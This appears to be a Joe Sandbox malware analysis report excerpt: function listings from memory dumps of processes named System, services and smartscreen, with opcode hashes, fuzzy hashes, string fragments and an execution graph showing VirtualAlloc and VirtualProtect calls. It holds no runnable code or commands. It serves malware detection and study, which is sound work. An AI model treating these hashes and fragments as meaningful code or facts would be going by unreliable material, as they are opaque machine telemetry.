                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1b9d076fd340b48b8dfc6a711cd123c70153ccb339c231fa06aa0981d75236c2
                                                                                                      • Instruction ID: 7ed67aa414f6ca703e54c1638fddbceed64c428eaf41d29fb62dbd8dcb6b2cfa
                                                                                                      • Opcode Fuzzy Hash: 1b9d076fd340b48b8dfc6a711cd123c70153ccb339c231fa06aa0981d75236c2
                                                                                                      • Instruction Fuzzy Hash: 20D05EB1E0571D4FEB64EF54848975473A1FF18700F4200A8A44893162DB345911CB00

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FFD9B8A68B6 Relevance: 6.5, Strings: 5, Instructions: 280COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%$)$+$`
                                                                                                      • API String ID: 0-1941960537
                                                                                                      • Opcode ID: 627c205dfb34970c5ff90bed4705e038f682cd85d5256b8ae03e7b4a97bdec7a
                                                                                                      • Instruction ID: b02c49268f80ad8cb05759ec16fe85f8c6de805da1f98f31f1b01784a90c38ce
                                                                                                      • Opcode Fuzzy Hash: 627c205dfb34970c5ff90bed4705e038f682cd85d5256b8ae03e7b4a97bdec7a
                                                                                                      • Instruction Fuzzy Hash: CDC10B70A1952D8FEB65DB54C8A4BE8B7B2FF88304F5045F9C01D97296CE35AA82CF50
                                                                                                      Function 00007FFD9B8DEE8B Relevance: 6.4, Strings: 5, Instructions: 114COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($+$E$H$n
                                                                                                      • API String ID: 0-1773399086
                                                                                                      • Opcode ID: a17e02b0ea07370bf1360961efa147f2f808c46624e49c4e1b9e27d4f8cf1ace
                                                                                                      • Instruction ID: c14aa28d82856e756f2823c50e8b62612e5442d1f1f5c3a4fb0a0fa350d80bea
                                                                                                      • Opcode Fuzzy Hash: a17e02b0ea07370bf1360961efa147f2f808c46624e49c4e1b9e27d4f8cf1ace
                                                                                                      • Instruction Fuzzy Hash: 8651FB70A0962D8FEB64DF58C894BA877F2FF98301F1043BAC40D96291DB396A858F41
                                                                                                      Function 00007FFD9B8DF29E Relevance: 5.0, Strings: 4, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$j$u$}
                                                                                                      • API String ID: 0-684171762
                                                                                                      • Opcode ID: f7615364c17f844dcc150c648fe6961187f6caa49698f7375522f849297bd157
                                                                                                      • Instruction ID: e5a88e1a82c99921b69d743d3d528e4686a0a49b6c014754602c8f7c7bd41c6d
                                                                                                      • Opcode Fuzzy Hash: f7615364c17f844dcc150c648fe6961187f6caa49698f7375522f849297bd157
                                                                                                      • Instruction Fuzzy Hash: BC113370A0922D8BDB64DF44C8547ADB3F2EF98310F1083A6C40D562A5CB385A85CF81

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B8A0DA0 Relevance: .3, Instructions: 291COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a0ab6a0b9bfa2785af6f0e78efd091e715d2a59aa09a20d90134362a0becf984
                                                                                                      • Instruction ID: 72040b879128e486b00e539efd7e4b73456ad2a75666791ed850411406153642
                                                                                                      • Opcode Fuzzy Hash: a0ab6a0b9bfa2785af6f0e78efd091e715d2a59aa09a20d90134362a0becf984
                                                                                                      • Instruction Fuzzy Hash: 64A1CFB1A19A4D8FE798EB68C8657A97FE1FF59310F4001AAD04DD32E6CF742812C751
                                                                                                      Function 00007FFD9B8A090D Relevance: .2, Instructions: 171COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cf76e9f555bae741801a80ea9a3a9e61d47822ea3f49b0b4e3121bca2c07dda2
                                                                                                      • Instruction ID: cb3f51c96fccf8ed26106d29320c64628641db62c8ffcd0e44be3536c49c06e1
                                                                                                      • Opcode Fuzzy Hash: cf76e9f555bae741801a80ea9a3a9e61d47822ea3f49b0b4e3121bca2c07dda2
                                                                                                      • Instruction Fuzzy Hash: 13516F71A1856D8FDB58FFA8E8A5AECBBA0FF58314F04057BD00DD7196DE24A442CB81
                                                                                                      Function 00007FFD9B8A08E8 Relevance: .2, Instructions: 152COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 93b0ff07132d24aa35e40390cd8c411bca77be1cfa4ee2656049c96bb5d8718f
                                                                                                      • Instruction ID: 35d905d34b74705b6054c78465226fa328ff2478ce33224d5b8bc991aa86e7d5
                                                                                                      • Opcode Fuzzy Hash: 93b0ff07132d24aa35e40390cd8c411bca77be1cfa4ee2656049c96bb5d8718f
                                                                                                      • Instruction Fuzzy Hash: 5B51B230A0891E9FCF54EFA8D894AED7BF1FF58314F05016AE419E7261DA34E981CB80
                                                                                                      Function 00007FFD9B8A3565 Relevance: .1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1a170f20f80e5de2e0fd274b4b0cf38ba143ce66b0f06469ec4928b73432d0c9
                                                                                                      • Instruction ID: eb322859d0b57b53328911218e977b0d69ba109359b8c9cf1732505631f31626
                                                                                                      • Opcode Fuzzy Hash: 1a170f20f80e5de2e0fd274b4b0cf38ba143ce66b0f06469ec4928b73432d0c9
                                                                                                      • Instruction Fuzzy Hash: D4519D70E1952D8EDBA4DF54C898BA977F0FB68301F5051EAD00DE22A5DF786A84CF41
                                                                                                      Function 00007FFD9B8A0998 Relevance: .1, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6371bcdc5f63e9ce2fbc70b975fa142f3de41170683f56fa7d8d276b1a53acdc
                                                                                                      • Instruction ID: 2b2f1a58744a98ff23aa182a4bdaf1120cf7e197722cedacbe2394a962585513
                                                                                                      • Opcode Fuzzy Hash: 6371bcdc5f63e9ce2fbc70b975fa142f3de41170683f56fa7d8d276b1a53acdc
                                                                                                      • Instruction Fuzzy Hash: 09418F30A15A5D8FEB94EFA8C495AEDBBF1FF58344F00016AD409E72A5DF346841CB50
                                                                                                      Function 00007FFD9B8A5AA6 Relevance: .1, Instructions: 122COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 823b1c9ab06009fd80e9ff5589387abb40f7db3f76fbf3a72c92927f56920e12
                                                                                                      • Instruction ID: b79b4bf157d622d5dc300065ba99254f3188f73a171105d16d15cd1644b41142
                                                                                                      • Opcode Fuzzy Hash: 823b1c9ab06009fd80e9ff5589387abb40f7db3f76fbf3a72c92927f56920e12
                                                                                                      • Instruction Fuzzy Hash: D4510934E0A91D8EEBB4DB58CC947E9B3B5EB48302F1542F5D00DA22A1DF396AC58F50
                                                                                                      Function 00007FFD9B8A0C25 Relevance: .1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 661ea1609c2bb113d3a50a6ef773479683b420660f17b5d9405af96217703732
                                                                                                      • Instruction ID: 8a6af8c2ba7708013c57772e881d558163aef1f41163b8d312a392e9c1d974b2
                                                                                                      • Opcode Fuzzy Hash: 661ea1609c2bb113d3a50a6ef773479683b420660f17b5d9405af96217703732
                                                                                                      • Instruction Fuzzy Hash: 6B216D36B0E2CD8FE71297A8DC211EC7760EF46310F0505B3C058CB1E2DA38260AC7A1
                                                                                                      Function 00007FFD9B8A36E9 Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 678eaf3abaab44085f8bf003697cafc9802c769f130e7ec08dac9ea3c485fddf
                                                                                                      • Instruction ID: 2e363c1a0605f991439f9aa534927e01a949ffc0f0aa64aeee0d47dcc529ac9c
                                                                                                      • Opcode Fuzzy Hash: 678eaf3abaab44085f8bf003697cafc9802c769f130e7ec08dac9ea3c485fddf
                                                                                                      • Instruction Fuzzy Hash: F8319C31E0851C9FDB94DF14C895AE973F1FB69301F5041EA900EE32A5DE75AA80CF42
                                                                                                      Function 00007FFD9B8A35FA Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 70f57b4473e96227db89b495d89924a06c71b94e4bf4cce946b542559e93bfe3
                                                                                                      • Instruction ID: 5d26a46eef1699b78f2f32f10113d4a6b26ccba3916119bb6d1f8d02dc3f23ba
                                                                                                      • Opcode Fuzzy Hash: 70f57b4473e96227db89b495d89924a06c71b94e4bf4cce946b542559e93bfe3
                                                                                                      • Instruction Fuzzy Hash: 3F31BA31E0851C9FCF94DF14C895AE973F0FB69301F5011DA900EE32A5DA75AA84CF42
                                                                                                      Function 00007FFD9B8A5CFB Relevance: .1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d68dbad8db0006350e60ed33d6018e45e82b19b987df855f5c098a7a359f5fce
                                                                                                      • Instruction ID: 26434ffb7b6f35e25a406d449146b1fa075e829a07f7795c0131b84a050dd699
                                                                                                      • Opcode Fuzzy Hash: d68dbad8db0006350e60ed33d6018e45e82b19b987df855f5c098a7a359f5fce
                                                                                                      • Instruction Fuzzy Hash: 83319774D1952D8EFBB4DF54C894BE9B3B1AB58302F1042E9D00DA62A1DF786AC5CF10
                                                                                                      Function 00007FFD9B8A5C22 Relevance: .1, Instructions: 70COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0a5c2c2280e4ded322c8970c26a049caa28013d329fe1d70ff5c6dd1b3315f14
                                                                                                      • Instruction ID: bc344770d7ebd2a75bad634c1fd45aa2784705b7a0a675ab96f558e2a6601101
                                                                                                      • Opcode Fuzzy Hash: 0a5c2c2280e4ded322c8970c26a049caa28013d329fe1d70ff5c6dd1b3315f14
                                                                                                      • Instruction Fuzzy Hash: EA31DA74E1961D8EEB64DF14CC98BE8B3B1AB58306F0542E5D00D962A1DF346AC5CF10
                                                                                                      Function 00007FFD9B8A0C38 Relevance: .1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fe8dada112c5e6a0bae89942d37ed229faedb24934b351be510b11fa555825df
                                                                                                      • Instruction ID: 9feb4f0c22d095a6b03321766a6ff30d2806950d6e3c83ea5c3274f29891ba60
                                                                                                      • Opcode Fuzzy Hash: fe8dada112c5e6a0bae89942d37ed229faedb24934b351be510b11fa555825df
                                                                                                      • Instruction Fuzzy Hash: 5F11E631B1E69E8EE7129B68CC212E97770EF46710F0645B3C058DB1E2DA38660AC7A1
                                                                                                      Function 00007FFD9B8A0C40 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c7250d9bd0a40483058ccdc641c7fae6f44c6b1dc998eb7a4598d227763f342b
                                                                                                      • Instruction ID: 1413ef6e0cc7e8ed0a0699b0ca23813341b168214de5d59779bc07e483d91db2
                                                                                                      • Opcode Fuzzy Hash: c7250d9bd0a40483058ccdc641c7fae6f44c6b1dc998eb7a4598d227763f342b
                                                                                                      • Instruction Fuzzy Hash: 48112331E0E6CE8EE7129B64CC211E97B70EF46710F0645B3C058DB1E2CA386609CBA1
                                                                                                      Function 00007FFD9B8A0C48 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4ee542361103f5f809b62e6d8e44c69eea89af796cdd4ad0b2ab92bb2091878f
                                                                                                      • Instruction ID: 19893fce761762b902b041c1fbe5c430712924eec165dac3b5af8ae06e23d43b
                                                                                                      • Opcode Fuzzy Hash: 4ee542361103f5f809b62e6d8e44c69eea89af796cdd4ad0b2ab92bb2091878f
                                                                                                      • Instruction Fuzzy Hash: 9511E571E0E2CE8FE7129B64CC255A97B70EF46700F0545B3D055DB1E2DA386619CBA1
                                                                                                      Function 00007FFD9B8A0C50 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5a049c32d268ba094fc167c5301f872c86694eb2356d6d63843329e00fc06ab
                                                                                                      • Instruction ID: e635c25ddaa138b92bbd8be5fa7551898d725af750dc4f6c11b87ecf201273ad
                                                                                                      • Opcode Fuzzy Hash: f5a049c32d268ba094fc167c5301f872c86694eb2356d6d63843329e00fc06ab
                                                                                                      • Instruction Fuzzy Hash: A8010070E0E2CE8EE7129BA4CC242A97BB0EF06700F0545B3C058DB1E2DA386618C762
                                                                                                      Function 00007FFD9B8A06A5 Relevance: .0, Instructions: 35COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 527401daea785124e93f486b54ac30290e33140114e394638a037a0c0f5f07b6
                                                                                                      • Instruction ID: 60ad955a0b9610ce828db16c15b2108e3513db342963961f59b6b62d13e61180
                                                                                                      • Opcode Fuzzy Hash: 527401daea785124e93f486b54ac30290e33140114e394638a037a0c0f5f07b6
                                                                                                      • Instruction Fuzzy Hash: 13F05430E1961E9FEB90EF68D4596ED77E0FF58705F110437E40CD21A0DA34A2A4CB81
                                                                                                      Function 00007FFD9B8A13E0 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7f415bfb32078b3233af399303f5822f141042c1c23fbc657de7f55b70bc281b
                                                                                                      • Instruction ID: 98de3e8f416d6d333382c4d4fd7a5252727c78815dd79c9057314aca8e2780f1
                                                                                                      • Opcode Fuzzy Hash: 7f415bfb32078b3233af399303f5822f141042c1c23fbc657de7f55b70bc281b
                                                                                                      • Instruction Fuzzy Hash: 3FF0BD30A1494D9FDF94EF68C448AEA7BE0FF68305F010566F819D3264D730E594CB81
                                                                                                      Function 00007FFD9B8A06C0 Relevance: .0, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3118b78612f35196733d3efac1001af450bfc23f7ea90388fb7bf1402dc6082
                                                                                                      • Instruction ID: c7369c5857161e4e1b8ac83200713f53729f7a097d481b1fdf38d6609910a3d2
                                                                                                      • Opcode Fuzzy Hash: a3118b78612f35196733d3efac1001af450bfc23f7ea90388fb7bf1402dc6082
                                                                                                      • Instruction Fuzzy Hash: 58F05430D1951E9FEB94FF64D4596ED77E0FF18304F010176E41CD21A5DA34A2A0CB81
                                                                                                      Function 00007FFD9B8A5E96 Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction ID: fd641316011508d055f1fcc3132530b8d55b579226e42211e0fc7dc118617d66
                                                                                                      • Opcode Fuzzy Hash: b57fd32d69fabe09c8a69e6f4bfa3f6c048901c29123a4572fa243570d179f16
                                                                                                      • Instruction Fuzzy Hash: 4C01C834E1A52DCEE775DB54C894BE9B3B1AB58302F1542B5C00DA22A1DF386AC58F50
                                                                                                      Function 00007FFD9B8A98F1 Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4f8523691c7f9c90781150e69c3189f431e7e05b6b004dcdb40246cc4e073e13
                                                                                                      • Instruction ID: c397b2191a0acab58ec7341348d39b2e8d9d79286c001da99a9ebabc59e6f0ce
                                                                                                      • Opcode Fuzzy Hash: 4f8523691c7f9c90781150e69c3189f431e7e05b6b004dcdb40246cc4e073e13
                                                                                                      • Instruction Fuzzy Hash: 55F03071E0D51D8EEBE5DB5C98686A9A7A1EF5C301F1542FAD01DD2292DE342AC18F01
                                                                                                      Function 00007FFD9B8A0CD7 Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 086e00ac1d58f8b804b1333a7f47f61b9fc790fcec526b7e714d21e67944ece6
                                                                                                      • Instruction ID: c95a609b43a6c77c9d1d47f3ceadedfb601b2ca4d899e5f71e357e339dedf958
                                                                                                      • Opcode Fuzzy Hash: 086e00ac1d58f8b804b1333a7f47f61b9fc790fcec526b7e714d21e67944ece6
                                                                                                      • Instruction Fuzzy Hash: 26F0CD30A0921A8BE714DB84C8A43FDB3B1FB54300F040A3AC019932E2CBB86680CB80
                                                                                                      Function 00007FFD9B8A73E8 Relevance: .0, Instructions: 25COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 31f2df06c8e85b5071e66afc9c6eb4f688c7d03b621a56ee3973ab20140d2a3f
                                                                                                      • Instruction ID: d69a580e968f998cc98099127803ce24fe74a7fff16f5ca40a9d5c7aeb11fdfa
                                                                                                      • Opcode Fuzzy Hash: 31f2df06c8e85b5071e66afc9c6eb4f688c7d03b621a56ee3973ab20140d2a3f
                                                                                                      • Instruction Fuzzy Hash: 3FF0FE71E059198AE7A4EB18DC656A9B6A1EF84745F1041F6D00D9A2D6DE342E838F40
                                                                                                      Function 00007FFD9B8A9889 Relevance: .0, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000034.00000002.2726920830.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_52_2_7ffd9b8a0000_services.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 185870f866dba72ef698c496ca4866c4b0d4729b629c8123389b10ed4677fda7
                                                                                                      • Instruction ID: 6fbc56a3cd9222dc58950474e575f30b658c65892955520408b81e3b86f36dcd
                                                                                                      • Opcode Fuzzy Hash: 185870f866dba72ef698c496ca4866c4b0d4729b629c8123389b10ed4677fda7
                                                                                                      • Instruction Fuzzy Hash: 8AE0C071E0D41D8AEFF5DB4C9854AA9A3B1EB58311F1546E5D00DD2191DE346A818F01

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.7%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:7
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 20487 7ffd9b8931bd 20488 7ffd9b8931db VirtualAlloc 20487->20488 20489 7ffd9b893170 20487->20489 20491 7ffd9b8932f5 20488->20491 20483 7ffd9b8917ce 20484 7ffd9b8917dd VirtualProtect 20483->20484 20486 7ffd9b89191d 20484->20486

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B89AEFD Relevance: 4.3, Strings: 1, Instructions: 3031COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000035.00000002.2799441333.00007FFD9B89A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89A000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_53_2_7ffd9b89a000_smartscreen.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: qM_H
                                                                                                      • API String ID: 0-3483471439
                                                                                                      • Opcode ID: 14f4ddd5c4fd11ca4076a2f228c6282f4d063b3c02a5a31d81ca1552741f1645
                                                                                                      • Instruction ID: 126f6610e1233de52da9636bc3363d1ce31374455bd2776d2eb999426fb8832b
                                                                                                      • Opcode Fuzzy Hash: 14f4ddd5c4fd11ca4076a2f228c6282f4d063b3c02a5a31d81ca1552741f1645
